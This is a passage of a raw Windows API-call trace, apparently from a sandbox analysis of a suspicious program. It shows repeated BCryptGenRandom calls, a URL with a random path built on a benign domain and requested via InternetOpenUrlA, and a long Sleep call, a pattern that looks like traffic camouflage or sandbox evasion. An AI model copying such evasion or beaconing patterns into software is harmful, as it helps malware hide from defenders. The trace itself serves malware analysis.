(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.976] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16cb7, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a16cb7) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.977] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.979] GetProcessHeap () returned 0x440000 [0255.979] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0255.979] lstrcpyA (in: lpString1=0x472f30, lpString2="\x89õ©ýs://www.yahoo.com" | out: lpString1="\x89õ©ýs://www.yahoo.com") returned="\x89õ©ýs://www.yahoo.com" [0255.979] lstrcatA (in: lpString1="\x89õ©ýs://www.yahoo.com", lpString2="/aeo9ekjswHclieivSOq6dmla0kyhOkckexmzlQ/vdexghos96kliMFIf0vNWhorl4ww3Bck0IjxhTToOrv4hu/35UdQhfb86s1Vaubkdwesprv1/" | out: lpString1="\x89õ©ýs://www.yahoo.com/aeo9ekjswHclieivSOq6dmla0kyhOkckexmzlQ/vdexghos96kliMFIf0vNWhorl4ww3Bck0IjxhTToOrv4hu/35UdQhfb86s1Vaubkdwesprv1/") returned="\x89õ©ýs://www.yahoo.com/aeo9ekjswHclieivSOq6dmla0kyhOkckexmzlQ/vdexghos96kliMFIf0vNWhorl4ww3Bck0IjxhTToOrv4hu/35UdQhfb86s1Vaubkdwesprv1/" [0255.979] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0255.980] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x89õ©ýs://www.yahoo.com/aeo9ekjswHclieivSOq6dmla0kyhOkckexmzlQ/vdexghos96kliMFIf0vNWhorl4ww3Bck0IjxhTToOrv4hu/35UdQhfb86s1Vaubkdwesprv1/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0255.980] GetProcessHeap () returned 0x440000 [0255.980] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0255.980] GetProcessHeap () returned 0x440000 [0255.980] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16c60 | out: hHeap=0x440000) returned 1 [0255.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0255.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0255.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0255.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0255.980] Sleep (dwMilliseconds=0x146e1) [0256.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0256.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.325] GetProcessHeap () returned 0x440000 [0256.325] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0256.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0256.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e3b, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d5e3b) returned 0x0 [0256.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.338] 